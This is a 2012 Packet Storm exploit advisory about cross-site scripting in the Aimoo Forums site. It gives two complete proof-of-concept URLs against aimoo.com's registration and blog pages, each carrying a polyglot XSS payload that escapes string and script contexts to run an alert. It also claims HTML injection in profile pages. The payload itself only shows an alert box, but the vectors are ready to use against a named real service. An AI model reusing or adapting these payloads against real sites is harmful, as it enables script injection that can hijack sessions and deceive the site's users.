Aimoo Forums Cross Site Scripting

2012-01-25T00:00:00
ID PACKETSTORM:109071
Type packetstorm
Reporter Sony
Modified 2012-01-25T00:00:00

Description

                                        
                                            `# Exploit Title: Aimoo Forums Cross Site Scripting  
# Date: 25.01.2012  
# Author: Sony  
# Software Link: http://www.aimoo.com/  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/01/aimoo-forums-cross-site-scripting.html  
..................................................................  
  
We have xss in the registration page:  
  
http://www.aimoo.com/CommunityName-%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E/Create.html  
  
Also in the blog page:  
  
http://zone.aimoo.com/blog/administrator/List/0/1%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
And in the profile page we have html code injection:  
  
http://profile.aimoo.com/neskaju  
http://zone.aimoo.com/photo/neskaju  
  
etc..(i think..)  
  
Demo Video:  
  
http://www.youtube.com/watch?v=8EdHWq7LLpY  
`